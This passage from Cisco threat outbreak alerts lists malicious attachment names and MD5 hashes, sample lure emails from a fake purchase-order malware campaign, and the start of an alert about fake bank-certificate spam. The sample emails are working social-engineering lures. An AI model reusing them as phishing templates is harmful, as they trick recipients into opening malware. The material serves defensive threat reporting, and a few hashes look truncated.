the following string: 0x51B426A9C115D85465CC10782CAD0C46 \n \nThe _Order list.pdf.exe_ file in the _Order list.pdf.rar_ attachment has a file size of 385,536 bytes. The MD5 checksum is the following string: 0x78A6D33C2B2AF0D8E0A57B9E82C1803D \n \nThe _PO#4424221.exe_ file in the _PO#4424221.rar_ attachment has a file size of 281,248 bytes. The MD5 checksum is the following string: 0x4D1DFBE44C2C2593BAC825D91C25D0DB \n \nThe _Document.exe_ file in the _New Order.rar_ attachment has a file size of 2,784,779 bytes. The MD5 checksum is the following string: 0x171E1C01A7B2CC6CC643584ADCD419A5 \n \nThe _PO140510.exe_ file in the _PO 140510.rar_ attachment has a file size of 706,048 bytes. The MD5 checksum is the following string: 0xE572F479BF91136777D12ED2DFC0E68C \n \nThe _PO #23312.exe_ in the _PO #23312.rar_ file has a file size of 338,432 bytes. The MD5 checksum is the following string: 0xBBA195A8F668CB24ED53578F1453E70B \n \nA third variant of the _Purchase order.scr_ file in the _Purchase order.rar _attachment has a file size of 1,079,872 bytes. The MD5 checksum is the following string: 0x8F59EF04397410C389FEE99C1CD28801 \n \nA variant of the _NEW ORDER.exe_ file in the _TT-COPY.rar_ attachment has a file size of 586,752 bytes. The MD5 checksum is the following string: 0x8D2CC1173DF8AF5A8EB55CADA02E4E07 \n \nThe _NewOrder.exe_ file in the _New Order.rar_ attachment has a file size of 687,616 bytes. The MD5 checksum is the following string: 0x0C133E21D1B87CE43129DE5C27F471C6 \n \nAn eighth variant of the _profoma invoice.exe_ file in the _profoma invoice.rar _attachment has a file size of 1,440,768 bytes. The MD5 checksum is the following string: 0x254B5C9CB803BF59CC8E6A6C91FA170D \n \nThe _PO.scr _file in the _Purchase order(2).rar _attachment has a file size of 626,240 bytes. The MD5 checksum is the following string: 0x750E3B2FC451AC766548EAD7D0CD137B \n \nThe _PO-140612.exe _file in the _PO-140612.rar_ attachment has a file size of 203,264 bytes. The MD5 checksum is the following string: 0xA33D4F6AC9680612A2E316662FA7807A \n \nThe _order_june.exe_ file in the _order_june.rar_ attachment has a file size of 990,208 bytes. The MD5 checksum is the following string: 0x4E7A89CFE31A2AA2893AE73295BD83D3 \n \nA ninth variant of the _Profoma Invoice.exe_ file in the _Profoma Invoice.rar _attachment has a file size of 598,016 bytes. The MD5 checksum is the following string: 0x809C01D3EF2B5752EF85E5D0C92D18FD \n \nThe _Order List.scr_ file in the _Order List.rar_ attachment has a file size of 417,280 bytes. The MD5 checksum is the following string: 0xB6293E9083C9EB2DD99111D97EFD60BB \n \nA third variant of the _NEW ORDER.exe_ file in the _NEW ORDER.rar_ attachment has a file size of 151,552 bytes. The MD5 checksum is the following string: 0x92908F0ED041E304771E171A87B82486 \n \nThe _PO32123 and Design.exe_ file in the _PO32123 and Design.rar_ attachment has a file size of 446,464 bytes. The MD5 checksum is the following string: 0xDFBE14376F54624E5F984F0FE4A5C515 \n \nThe _PI.exe_ file in the _payment slip.rar_ attachment has a file size of 1,601,518 bytes. The MD5 checksum is the following string: 0xD7C521305815350918DA369B3E4CF35D \n \nThe _Order.exe_ file in the _Order.rar_ attachment has a file size of 637,952 bytes. The MD5 checksum is the following string: 0x58E2D9E7545EC4C213900621447F8B5F \n \nThe _July Order.exe_ file in the _July Order.rar_ attachment has a file size of 100,352 bytes. The MD5 checksum is the following string: 0x4210279A640B282E5DA82640B744A8FA \n \nThe _order 1.exe_ file in the _order 1.rar_ attachment has a file size of 493,056 bytes. The MD5 checksum is the following string: 0x421F062F6E8B39F6CF4EA464BD42141B \n \nA fourth variant of the _New Order.exe_ file in the _New Order5..rar _attachment has a file size of 169,984 bytes. The MD5 checksum is the following string: 0x443846489CE03FAFF0949F910B3A3AE3 \n \nThe _PO#889458.exe_ file in the _PO#889458.rar_ attachment has a file size of 366,592 bytes. The MD5 checksum is the following string: 0x8BB415F5FADE12F6667A3FE78F305AA9 \n \nThe _PO987466.exe_ file in the _PO987466.rar_ attachment has a file size of 370,176 bytes. The MD5 checksum is the following string: 0xA0CE9F8291A08CE935221E5D06F3934F \n \nThe _CATALOGUE.exe_ file in the _CATALOGUE.rar_ attachment has a file size of 1,383,424 bytes. The MD5 checksum is the following string: 0xD18136E8C497E4B485A2A90145A786FD \n \nThe _Payment Slip Copy.exe_ file in the _Payment Slip Copy.rar_ attachment has a file size of 577,536 bytes. The MD5 checksum is the following string: 0xD6FC2E73C5A22FF4F1A575F39020F686 \n \nThe _PO #110814.exe_ file in the _PO #110814.rar_ attachment has a file size of 342,016 bytes. The MD5 checksum is the following string: 0xA9A53F71D60FA51D07F7226ABDEA73B7 \n \nA fifth variant of the _New Order.exe_ file in the _New Order.rar_ attachment has a file size of 922,112 bytes. The MD5 checksum is the following string: 0x39A977C131563CCABAD2A4953271B3AE \n \nA variant of the _Purchase_Order.exe_ file in the _Purchase_Order.rar_ attachment has a file size of 873,984 bytes. The MD5 checksum is the following string: 0x2F82681B6D7E41BEE7FB84BB94FB5675 \n \nThe _P.O.exe_ file in the _P.O.rar_ attachment has a file size of 1,005,440 bytes. The MD5 checksum is the following string: 0xE4EC7C3028246BDA44A181058AAB7A7E \n \nA variant of the __Payment Slip Copy.exe__ file in the _Payment Slip .rar_ attachment has a file size of 499,200 bytes. The MD5 checksum is the following string: 0xB11715EAB2FA74B138837697589A38 \n \nA tenth variant of the _Profoma Invoice.exe_ file in the __Profoma Invoice.rar__ attachment has a file size of 1,000,448 bytes. The MD5 checksum is the following string: 0x7537588576DF5E49C94E8A8477E24869 \n \nThe _Product detail.exe_ file in the _Product detail.rar_ attachment has a file size of 1,513,984 bytes. The MD5 checksum is the following string: 0xB6B19612A748BF6893F2840EA0E2D1D3 \n \nThe _specification.scr_ file in the _specification.rar_ attachment has a file size of 386,560 bytes. The MD5 checksum is the following string: 0xCBFE75B3E3ECD4DEA457493567906CED \n \nThe _ORDER LIST.pdf.....................................exe_ file in the _ORDER LIST.rar_ attachment has a file size of 346,112 bytes. The MD5 checksum is the following string: 0xFEFC992AC0CB2FB056413259C0DC5A11 \n \nThe _NewOrder02.exe_ file in the _New Order Catalogue.rar_ attachment has a file size of 651,776 bytes. The MD5 checksum is the following string: 0x03D3CBEDAB34CE84C00A22D6F631D594 \n \nThe _Scan copy.exe_ file in the _Scan copy.rar _attachment has a file size of 469,504 bytes. The MD5 checksum is the following string: 0xEEDD66980DAA46E53494DBAD6A135BCF \n \nAn eleventh variant of the _Profoma Invoice.exe_ file in the _Profoma Invoice.rar_ attachment has a file size of 470,016 bytes. The MD5 checksum is the following string: 0x949AD2B94004C8E4A31325B03C77881F \n \nA variant of the _Scan Copy.exe_ file in the _Scan Copy.rar_ attachment has a file size of 479,744 bytes. The MD5 checksum is the following string: 0x025842267CCBD35717448A0803C437AB \n \nThe _Payment copy.exe_ file in the _Payment copy.rar_ attachment has a file size of 475,136 bytes. The MD5 checksum is the following string: 0xEB3FBFB9168064AB081A6C5EBA69D897 \n \nThe _PO-#09032014.exe_ file in the _PO-#09032014.rar_ attachment has a file size of 724,536 bytes. The MD5 checksum is the following string: 0xB732741DCAB216110A36A86F7912C06B \n \nA sixth variant of the _New Order.exe_ file in the _New Order.rar_ attachment has a file size of 1,452,667 bytes. The MD5 checksum is the following string: 0x4636224908A9D0EECAD3BCB27C731D71 \n \nThe _Quote List.exe_ file in the _Quote List.rar _attachment has a file size of 479,232 bytes. The MD5 checksum is the following string: 0x6F5A90470553AA3F14E58C844E403003 \n \nThe _PO#56980..exe_ file in the _PO#56980..rar_ attachment has a file size of 458,296 bytes. The MD5 checksum is the following string: 0xD3033C0D25C8EE8D1F788BCEA300C478 \n \nThe _Copy PO.exe_ file in the _Copy PO.rar_ attachment has a file size of 454,656 bytes. The MD5 checksum is the following string: 0x18833322EE9602A1B97D8B293A7A7837 \n \nThe _Proforma Invoice.exe_ file in the _Proforma Invoice.rar_ attachment has a file size of 544,768 bytes. The MD5 checksum is the following string: 0x355FC873ACD9B86E748D1AF9510072D7 \n \nThe_ PO768493.exe _file in the _PO768493.rar_ attachment has a file size of 486,400 bytes. The MD5 checksum is the following string: 0x90D0AA7508244557A8E3B4A9A365EB \n \nA variant of the _P.O.exe_ file in the _PO.rar _attachment has a file size of 457,728 bytes. The MD5 checksum is the following string: 0xB63A8FA2CCBF4226C87A609681A4C275 \n \nThe following text is a sample of the email message that is associated with this threat outbreak: \n\n> Message Body: \n \n**Dear Sir/ Madam, \nWe are interested in purchasing your product and we sincerely hope to establish a long-term business relationship with your esteemed company. Please kindly send us your latest catalog. Also, \ninform us about the Minimum Order Quantity, Delivery time, FOB and payment terms and warranty. Your early reply is highly appreciated. Please, view the attachment to see the product samples and \ndetails. \nWarm Regards \nLiu Wang**\n\nOr \n\n> Message Body: \n \n**Dear supplier, \nCan you send us a quotation for supplying of Attached products. We \nmarked the required products with blue ink in the attached P.I \nDelivery to be in N.Y 91768 United States. \nAdvise on cost of delivery via sea or air \nWhat are the delivery timelines? \nThank You \nBest Regards \nMark Gomez**\n\nOr \n\n> Subject: **We are so sorry for our late response** \n \nMessage Body: \n \n**Dear Sir/Madam, \nPlease view the products i want to buy and let me know if you have it available. \nPlease let me know the mode of payment, method of delivery. \nAttached is the list of all the products i want to purchase. \nAwaiting your urgent response! \nBest Regards, \nRita Zheng**\n\nOr \n\n> Subject: **QUOTATION FOR INVOICE** \n \nMessage Body: \n \n**Dear Sir, \ncheck the attachment for the profoma invoice. \nagreement,note that attached is the amended purchase invoice and design for OUR shipment, because price in invoice was not our agreement after the confirmation of the order. kindly confirm that the stated prices are correct. \nI expect to receive the shipment of goods within the specified time on this order. Get back to us with your confirmation and your profoma for payment arrangement. \nRegards, \nMiss Katie Xu \nGuangzhou Xin Yi Metal Co Ltd \nContact Person: Miss Katie Xu \nPosition: Sales Manager \nOffice Address: No.3 Kang Mei Road Fu Ling Industrial Park Tang Mei, Xin Tang Zeng Cheng.**\n\nOr \n\n> Message Body: \n \n**Dear Sir, \nkindly provide us the invoice of the attached purchase order so we can confirm and make our payment. thanks \nRegards, \nAl Sheik Nayan**\n\nOr \n\n> Subject: **Re: Order quantity is 1000000pcs** \n \nMessage Body: \n \n**Hello Friend, \nThanks for fast reply, it's ok we contact by email, but many other customer in china use Skype and Wechat, it's more fast and convenient. \nits ok anyway, please check below: \nYou said If i could provide TNT or DHL account number you can send samples within 7 working days, that your payment terms is 30% deposit and 70% before shipment by T/T, and you can't accept L/C. \nPlease i want you to confirm and accept the price $285.00 with $83.00 and order quantity is 1000000pcs first time after you confirm the samples. \nPlease check Attached file for sample picture to proceed on. \nThanks for your patience. \nIf there is any question, please don't hesitate to contact us. \nBest Regards, \nIntertek Sales person - Indonesia**\n\nOr \n\n> Subject:** Purchase Order \n** \nMessage Body: \n \n**Hello Sir/Madam, \nGood day to you. Attached is a new Purchase Order that requires urgent attention, we will appreciate if you go through it and get back to us immediately so that we will be able to meet the demand of our customers. \nThank you, \nGirish Joshi**\n\nOr \n\n> Subject: **Fw: Re: Order confirmation and Balance Payment** \n \nMessage Body: \n \n**Dear Sir, \nPlease advise current status of our pending orders. Attached you can find photos of defective supply we have received from you and I would like to ask you to investigate it as soon as possible since we are receiving complaints and claims from our customers. \nFind enclosed our new purchase order. Confirm to raise Proforma asap. Meanwhile concerning old balance we will advise you swift copy this week. Looking forward to having prosperous relation. \nKind Regards,**\n\nOr \n\n> Message Body: \n \n**Please find attached the order kindly do the needful. \nThanks \nRegards**\n\nOr \n\n> Subject: **P/I FOR NEW ORDER** \n \nMessage Body: \n \n**Dear Sir, \nbase on our last discussion in our previous mail, kindly check the attach for the proforma invoice \nagreement,note that attached is the amended purchase invoice and design for OUR shipment, because price in invoice was not our agreement after the confirmation of the order. kindly confirm that the stated prices are correct. \nI expect to receive the shipment of goods within the specified time on this order. Get back to us with your confirmation and your profoma for payment arrangement. \nRegards,**\n\nOr \n\n> Message Body: \n \n**Good morning. \nThis is a follow up of the email I sent to you some three weeks ago. \nI did not receive any response from you. And I wonder why. \nMy colleague Phil has also tried to contact you today. I am sending \nthis as a follow up \nto ensure we get a response from you this time. \nPlease find attached our product order. \nWe would like an urgent delivery of all the products listed in the \nattached Order. \nKindly confirm AVAILABILITY OF MATERIAL, LEAD TIME AND PAYMENT TERMS. \nWe look forward to have your most competitive/workable offer. \nThanking you for your kind anticipation in advance. \nYours faithfully,**\n\nOr \n\n> Message Body: \n \n**Please with regards to your reply. Kindly see the revised purchase order \nfor our new order. Arrange proforma invoice for our order. \nWaiting for your reply. \nBest Regards**\n\nOr \n\n> Message Body: \n \n**Dear Sir, \nbase on our last discussion in our previous mail, kindly check the attach for the proforma invoice \nagreement,note that attached is the amended purchase invoice and design for OUR shipment, because price in invoice was not our agreement after the confirmation of the order. kindly confirm that the stated prices are correct. \nI expect to receive the shipment of goods within the specified time on this order. Get back to us with your confirmation and your profoma for payment arrangement. \nRegards**\n\nOr \n\n> Message Body:\n\n> **sir/Madam, \nI have called your office number but cannot connect to you, could you please \nlook into attached invoice and confirm if this invoice was altered as our boss \nhas asked us to reconfirm with you immediately. \nAwaiting your swift response.**\n\nOr \n\n> Message Body: **Please with regards to your reply. Kindly see the revised purchase order \nfor our new order. Arrange proforma invoice for our order. \nWaiting for your reply. \nBest Regards,**\n\nOr \n\n> Subject: **FOB prices** \n \nMessage Body: \n \n**Hello, \nThis is Heather from Rite-Hite Company, LLC. \nAttached is our order. kindly send me a quote and \ninclude delivery terms, payment methods and terms and any further information you will need. \nWe are requesting FOB prices in USD for 40 ft container and also provided attached list of items as well. \nKindly update us with your latest products and advice your minimum quantity as well,We look forward to doing business with you. \nEnter the following security code to open file:1122 \nRegards,**\n\nOr \n\n> Message Body: \n \n**Dear sir/Madam, \nWith reference to the above subject and as per the requirements placed by you on us, we have attached herewith the Proforma Invoice dated. 23.11.2013 for purchase made on the 17th of Feb 2014 \nYou are kindly requested to reconfirm bank account details as we arrange for deposition of your payment . \nYour urgent attention in this matter will be highly appreciated. \nPlease confirm by return mail. \nThank you and kind Regards, \nAccounts Department**\n\nOr \n\n> Message Body: \n \n**Good Morning!!! \nPlease find attached herewith copy of our new order as per directed by \nmy Boss \nKindly do the needful and return back the copy . \nYour urgent reply will be much appreciated \nRegards,**\n\nOr \n\n> Subject:** T/T Payment \n** \nMessage Body: \n \n**Dear sir, \nPlease find attached the TT payment made to your account today by our \ncustomer Confirm receipt. \nRegards, \nExport/Purchase Dept. \n**\n\nOr \n\n\n> Subject: **Fwd: Invoice for our Purchase Order urgently needed??\u200f** \n\n\nOr \n\n\n> Subject: **FW: Re:New Supplier: 1st Order** \n \nMessage Body: \n \n**Dear, \nHope you are fine, my friend. \nI haven't received any information from your side. Did you read my last E-mail? Hope it didn't come to your junk box. May I have your idea about our 1st order? \nTo remind you , details of the final details is attached. \nHope we can build good cooperation with you.I am looking forward to \nhearing from you. \n**\n\nOr \n\n\n> Message Body: \n \n**Dear Sir, \nkindly provide us the invoice of the attached purchase order so we can \nconfirm and make our payment. thanks \n**\n\nOr \n\n\n> Subject: **NEW Order** \n \nMessage Body: \n \n**Dear Sir, \nPlease kindly confirm this attached purchase order. \nWe require to know the minimum order quantity [M.O.Q] Price per piece, \npayment terms and possibly shipping to our company. Attach is the sample \npicture that i need from your company. \nLooking forward to your kind reply. \nThanks and best regards** \n\n\nOr \n\n\n> Subject: **Fw:Re: New Item Quotation** \n \nMessage Body: \n \n**Hello, \nPlease do kindly acknowledge our order and please issue your PI \nasap.Also on your proforma invoice,do clearly state your possible \ndelivery time for attached order, \npls address invoice with company details below \nCompany: TESOTEX S.R.O. \n**\n\nOr \n\n\n> Subject: **Fwd: Im back from holiday** \n\n\nOr** \n**\n\n> **Subject: Re:Re:Re: Purchase Order. \n \nMessage Body: \n \nHello Dear , \nPlease confirm attached Purchase Order as we have evaluated the PI \nsent to us last week from your \ncompany. \nThis order is needed urgently considering the high demand to meet our \nrequirement as well as our \ncustomers. Do advice your delivery timeline. \nAppreciate your response as I express my kind regards and look forward \nto establishing a deep working \nrelationship your company. \nThank you. \nToney Nguyen. \nPurchasing Dept. \nVIETTRUNG PAPER PACKAGING Co., Ltd \n2B ST,VINH LOC INDUSTRIAL ZONE,BINH TAN DIST,HCM CITY,VIETNAM \nTel: +84 37650676 - 37650681 Ext: 309 Fax: +84 37650677 \n\\- 37651263 \nMobile: +84 983415210+84 983415210 \nEmail: tran.thi.be.phuong@viettrung.com** \n\n\nOr \n\n\n> Subject: July Order \n \nMessage Body: \n \n**Good Morning Sir, \nplease here is the purchase order information for July 2014 and kindly prepare PI. \nNote to state in the invoice our payment terms still remains 30% downpayment and the rest after have receive copy BL. \nWe appreciate your priceless effort and support as always! \n** Please do not forget to use the new price list in the purchase order like we discuss cause we now have many competitors in the market** \nBest regards, \nleong liew. \nZhangjiagang Huadian Import &amp; Export Co., Ltd. \n8th-12th floor, Bldg.1, \nNo.9 Shouti South Road, \nHaidian District, \nBeijing 100048, China. \nFax: 86-10-88395308 \n\\------------------------------------------------------------------------------------------------------------------- \nImportant Notice: The information contained in this e-mail and any attachment(s) \nis confidential and for the use of the named addressee(s) only. If you are not the \nintended recipient of this e-mail, do not duplicate, redistribute, or use it by any \nmeans. Please delete this e-mail and any attachment(s) and notify us immediately. \nUnauthorized use, reliance, disclosure or copying of the contents of this e-mail and \nany attachment(s), or any similar action, is strictly prohibited. \nPT LIPPO GENERAL INSURANCE Tbk reserves the right, to the extent permitted \nby applicable law, to retain, monitor and intercept e-mail messages both to and from \nits systems and please note that the integrity of e-mail across the internet cannot be \nguaranteed and PT LIPPO GENERAL INSURANCE Tbk do not accept liability \nfor loss or damage arising in any way from receipt, use or delay of this e-mail and any \nattachment(s) nor for improper or incomplete transmission of the information contained \ntherein, by or to PT LIPPO GENERAL INSURANCE Tbk.** \n\n\nOr \n\n\n> Subject: **Give us your Quotations** \n \nMessage Body: \n \n**Dear sir, \nThis is Lateef group of companies. We are interested in your products and will like to establish a long lasting buisness relation with your company. \nHere we have attached our order for you to see and give us best price and quotation. \nPlease confirm the password is 1977. \nMr Micheal \nSalesman Lateef Group of companiesDear sir, \nThis is Lateef group of companies. We are interested in your products and will like to establish a long lasting buisness relation with your company. \nHere we have attached our order for you to see and give us best price and quotation. \nPlease confirm the password is 1977. \nMr Micheal \nSalesman Lateef Group of companies** \n\n\nOr \n\n\n> Subject: **Re: Re:August Order** \n \nMessage Body: \n \n**Dear Sir, \nkindly provide us the invoice of the attached purchase order so we can \nconfirm and make our payment. thanks \nThanks and best regards. \nRyan Abraham \nCREATION SOURCE EST. \n**\n\nOr \n\n\n> Subject: **Product Inquiries** \n \nMessage Body: \n \n**Hello.Sir/madam. \nThis is Ms. Erica Archie of the Watson Enterprises in the Michigan \nUnited States. Watson Enterprises has imported general goods into the \nMichigan from \nvarious countries. We are currently looking at the prospect of \nsourcing some of your products for our new distributing outlet in the \nAsia pacific. Please \nopen the attached document and furnish us with the below information. \nPrefer to receive the following information: \n\\- Your last asking price for each listed product attached \n\\- FOB prices (for minimum order quantity) \n\\- Delivery time \n\\- Minimum order quantity \n**\n\nOr \n\n\n> Message Body: \n \n**Dear Sir, \nPlease acknowledge attached PO and advise gross weight once available. and advise on delivery and \nsend me PI asap. \nThanks. \nBest regards, \nVele Mr. \nCapital-Jah Investment LTD \n**\n\nOr \n\n\n> Subject: **Re:Please Open The Attachment To View Your TTPayment Slip** \n \nMessage Body: \n \n**Please open the attachment to view your payment slip for confirmation \nTelegraphic payment made to you. \nBest Regards. \nLi Gu \n**\n\nOr** \n**\n\n> Subject: **RE: PI FOR NEW ORDER** \n \nMessage Body: \n \n**Dear value customer \nwe really do appreciate our business relationship with your company and the attach is our new proforma invoice. \nbase on your quotation sent to us check, if the price and your mail address are currect,i hope to maintain good business relationship with you in the funture. \nyour faithfully \nKim Yu \n**\n\nOr \n\n\n> Message Body: \n \n**ATTN: Kindly find attached and confirm our Order/Color Specification. We request for your competitive offer and Invoice for \nthe stated Items, Including Payment terms with earliest delivery schedule. \nRegards. \n**\n\nOr \n\n\n> Subject: **Please open the attachment to view your payment slip for confirmation \n** \nMessage Body: \n \n**Please open the attachment to view your payment slip for confirmation \nTelegraphic payment made to you. \nBest Regards. \n**\n\nOr \n\n\n> Message Body: \n** \nAs attached is the pending proforma invoice, please review let's proceed on the transaction as discussed, we will be pleased to pay 30% start up payment. FYI Buyers complained on the high cost of the previous supplied.**\n\n> > > > > > > > > > > > > ****\n\n> Cisco Security analysts examine real-world email traffic data that is collected from over 100,000 contributing organizations worldwide. This data helps provide a range of information about and analysis of global email security threats and trends. Cisco will continue to monitor this threat and automatically adapt systems to protect customers. This report will be updated if there are significant changes or if the risk to end users increases. \n \nCisco security appliances protect customers during the critical period between the first exploit of a virus outbreak and the release of vendor antivirus signatures. Email that is managed by Cisco and end users who are protected by Cisco Web Security Appliances will not be impacted by these attacks. Cisco security appliances are automatically updated to prevent both spam email and hostile web URLs from being passed to the end user. \n \n**Related Links** \n[Cisco Security](<http://www.cisco.com/security>) \n[Cisco SenderBase Security Network](<http://www.senderbase.org/>) \n\n\nCall\n\nSend SMS\n\nAdd to Skype\n\nYou'll need Skype CreditFree via Skype\n\n## \n\nRevision History \n\n * Version | Description | Section | Date \n---|---|---|--- \n69 | Cisco Security has detected significant activity on September 14, 2014. | | 2014-September-16 12:31 GMT \n68 | Cisco Security has detected significant activity on September 11, 2014. | | 2014-September-15 13:14 GMT \n67 | Cisco Security has detected significant activity on September 8, 2014. | | 2014-September-10 12:53 GMT \n66 | Cisco Security has detected significant activity on September 6, 2014. | | 2014-September-08 14:07 GMT \n65 | Cisco Security has detected significant activity on September 4, 2014. | | 2014-September-05 11:30 GMT \n64 | Cisco Security has detected significant activity on September 3, 2014. | | 2014-September-04 11:25 GMT \n63 | Cisco Security has detected significant activity on September 2, 2014. | | 2014-September-02 14:41 GMT \n62 | Cisco Security has detected significant activity on August 28, 2014. | | 2014-August-29 12:50 GMT \n61 | Cisco Security has detected significant activity on August 25, 2014. | | 2014-August-26 12:32 GMT \n60 | Cisco Security has detected significant activity on August 16, 2014. | | 2014-August-18 13:51 GMT \n59 | Cisco Security has detected significant activity on August 13, 2014. | | 2014-August-14 13:38 GMT \n58 | Cisco Security has detected significant activity on August 12, 2014. | | 2014-August-13 12:24 GMT \n57 | Cisco Security has detected significant activity on August 11, 2014. | | 2014-August-12 13:47 GMT \n56 | Cisco Security has detected significant activity on August 10, 2014. | | 2014-August-11 15:24 GMT \n55 | Cisco Security has detected significant activity on August 6, 2014. | | 2014-August-08 12:54 GMT \n54 | Cisco Security has detected significant activity on August 2, 2014. | | 2014-August-04 12:36 GMT \n53 | Cisco Security has detected significant activity on July 28, 2014. | | 2014-July-29 12:21 GMT \n52 | Cisco Security has detected significant activity on July 25, 2014. | | 2014-July-28 12:05 GMT \n51 | Cisco Security has detected significant activity on July 20, 2014. | | 2014-July-21 18:31 GMT \n50 | Cisco Security has detected significant activity on July 15, 2014. | | 2014-July-15 18:32 GMT \n49 | Cisco Security has detected significant activity on July 10, 2014. | | 2014-July-11 12:22 GMT \n48 | Cisco Security has detected significant activity on July 8, 2014. | | 2014-July-09 13:03 GMT \n47 | Cisco Security has detected significant activity on June 25, 2014. | | 2014-June-26 11:57 GMT \n46 | Cisco Security has detected significant activity on June 17, 2014. | | 2014-June-18 13:13 GMT \n45 | Cisco Security has detected significant activity on June 16, 2014. | | 2014-June-17 19:05 GMT \n44 | Cisco Security has detected significant activity on June 12, 2014. | | 2014-June-13 13:09 GMT \n43 | Cisco Security has detected significant activity on June 6, 2014. | | 2014-June-09 12:06 GMT \n42 | Cisco Security has detected significant activity on June 1, 2014. | | 2014-June-03 11:44 GMT \n41 | Cisco Security has detected significant activity on May 29, 2014. | | 2014-May-30 13:36 GMT \n40 | Cisco Security has detected significant activity on May 23, 2014. | | 2014-May-27 12:12 GMT \n39 | Cisco Security has detected significant activity on May 14, 2014. | | 2014-May-16 13:16 GMT \n38 | Cisco Security has detected significant activity on May 14, 2014. | | 2014-May-15 11:28 GMT \n37 | Cisco Security has detected significant activity on May 12, 2014. | | 2014-May-13 11:42 GMT \n36 | Cisco Security has detected significant activity on May 8, 2014. | | 2014-May-09 13:38 GMT \n35 | Cisco Security has detected significant activity on May 5, 2014. | | 2014-May-05 12:19 GMT \n34 | Cisco Security has detected significant activity on April 30, 2014. | | 2014-May-01 12:49 GMT \n33 | Cisco Security has detected significant activity on April 29, 2014. | | 2014-April-30 13:51 GMT \n32 | Cisco Security has detected significant activity on April 27, 2014. | | 2014-April-29 11:58 GMT \n31 | Cisco Security has detected significant activity on April 20, 2014. | | 2014-April-22 13:10 GMT \n30 | Cisco Security has detected significant activity on April 17, 2014. | | 2014-April-18 12:53 GMT \n29 | Cisco Security has detected significant activity on April 16, 2014. | | 2014-April-17 13:41 GMT \n28 | Cisco Security has detected significant activity on April 13, 2014. | | 2014-April-15 12:51 GMT \n27 | Cisco Security has detected significant activity on April 9, 2014. | | 2014-April-10 13:31 GMT \n26 | Cisco Security has detected significant activity on April 7, 2014. | | 2014-April-09 12:24 GMT \n25 | Cisco Security has detected significant activity on April 7, 2014. | | 2014-April-08 13:10 GMT \n24 | Cisco Security has detected significant activity on April 3, 2014. | | 2014-April-04 13:39 GMT \n23 | Cisco Security has detected significant activity on April 2, 2014. | | 2014-April-03 12:19 GMT \n22 | Cisco Security has detected significant activity on March 25, 2014. | | 2014-March-27 12:28 GMT \n21 | Cisco Security has detected significant activity on March 23, 2014. | | 2014-March-24 13:24 GMT \n20 | Cisco Security has detected significant activity on March 19, 2014. | | 2014-March-20 12:44 GMT \n19 | Cisco Security has detected significant activity on March 17, 2014. | | 2014-March-18 12:39 GMT \n18 | Cisco Security has detected significant activity on March 6, 2014. | | 2014-March-10 13:03 GMT \n17 | Cisco Security has detected significant activity on March 6, 2014. | | 2014-March-07 13:35 GMT \n16 | Cisco Security has detected significant activity on March 4, 2014. | | 2014-March-06 15:41 GMT \n15 | Cisco Security has detected significant activity on March 3, 2014. | | 2014-March-04 12:47 GMT \n14 | Cisco Security has detected significant activity on February 27, 2014. | | 2014-February-28 12:33 GMT \n13 | Cisco Security has detected significant activity on February 25, 2014. | | 2014-February-26 13:37 GMT \n12 | Cisco Security has detected significant activity on February 23, 2014. | | 2014-February-25 11:09 GMT \n11 | Cisco Security has detected significant activity on February 22, 2014. | | 2014-February-24 14:05 GMT \n10 | Cisco Security has detected significant activity on February 18, 2014. | | 2014-February-20 14:01 GMT \n9 | Cisco Security has detected significant activity on February 12, 2014. | | 2014-February-14 14:01 GMT \n8 | Cisco Security has detected significant activity on February 12, 2014. | | 2014-February-13 14:07 GMT \n7 | Cisco Security has detected significant activity on February 7, 2014. | | 2014-February-10 14:08 GMT \n6 | Cisco Security has detected significant activity on February 5, 2014. | | 2014-February-06 13:39 GMT \n5 | Cisco Security has detected significant activity on January 30, 2014. | | 2014-January-31 14:07 GMT \n4 | Cisco Security has detected significant activity on January 22, 2014. | | 2014-January-24 12:42 GMT \n3 | Cisco Security has detected significant activity on January 22, 2014. | | 2014-January-22 15:10 GMT \n2 | Cisco Security has detected significant activity on January 15, 2014. | | 2014-January-17 13:53 GMT \n1 | Cisco Security has detected significant activity on December 22, 2013. | | 2013-December-23 13:39 GMT \nShow Less\n\n* * *\n\n## \n\nLegal Disclaimer \n\n * THIS DOCUMENT IS PROVIDED ON AN \"AS IS\" BASIS AND DOES NOT IMPLY ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE ALERTS AT ANY TIME. \n\nA standalone copy or paraphrase of the text of this document that omits the distribution URL is an uncontrolled copy and may lack important information or contain factual errors. The information in this document is intended for end users of Cisco products \n", "modified": "2014-09-16T12:31:15", "published": "2013-12-23T13:39:41", "id": "CISCO-THREAT-32261", "href": "http://tools.cisco.com/security/center/viewThreatOutbreakAlert.x?alertId=32261", "type": "ciscothreats", "title": "Threat Outbreak Alert: Fake Product Order Notification Email Messages on September 14, 2014", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-07-26T12:05:36", "bulletinFamily": "info", "description": "Medium\n\nAlert ID: \n\n28320\n\nFirst Published:\n\n2013 February 20 19:42 GMT\n\nLast Updated:\n\n2013 August 30 17:50 GMT\n\nVersion: \n\n40\n\n## \n\n Summary \n\n * Cisco Security has detected significant activity related to spam email messages that claim to contain a new digital certificate from the Bank of America CashPro Online Security Team for the recipient. The text in the email message attempts to convince the recipient to open the attachment for instructions on the installation process. However, the _.zip_ attachment contains a malicious _.exe_ file that, when executed, attempts to infect the system with malicious code. \n \nEmail messages that are related to this threat (RuleID5342, RuleID5342KVR, and RuleID5342KVR_1) may contain any of the following files:\n\n> _cashpro_digital_cert_0115793115810218904.zip_ \n_cashpro_digital_cert_{DIGIT[19]}.exe_ \n_incoming_fax_02212013_1497271871046855581.zip_ \n_incoming_fax_02212013_{DIGIT[19]}.exe_ \n_fax_26022013_6058380428875401665.zip_ \n_fax_26022013_{DIGIT[19]}.exe_ \n_fax_id883826187478237567_02262013.zip_ \n_fax_id{DIGIT[18]}_02262013.exe_ \n_SecureMessage_21125128673745134251.zip_ \n_SecureMessage_{DIGIT[20]}.exe_ \n_ACH_Batch_6002132.zip_ \n_ACH_Batch_11032013.exe_ \n_ADP_PAYROL_19289981.zip_ \n_ADP_PAYROL_19289981.exe_ \n_Credit_Report_03142013.zip_ \n_Credit_Report_03142013.exe_ \n_cashpro_digital_cert_8540516074817067661.zip_ \n_cashpro_digital_cert_{DIGIT[19]}.exe_ 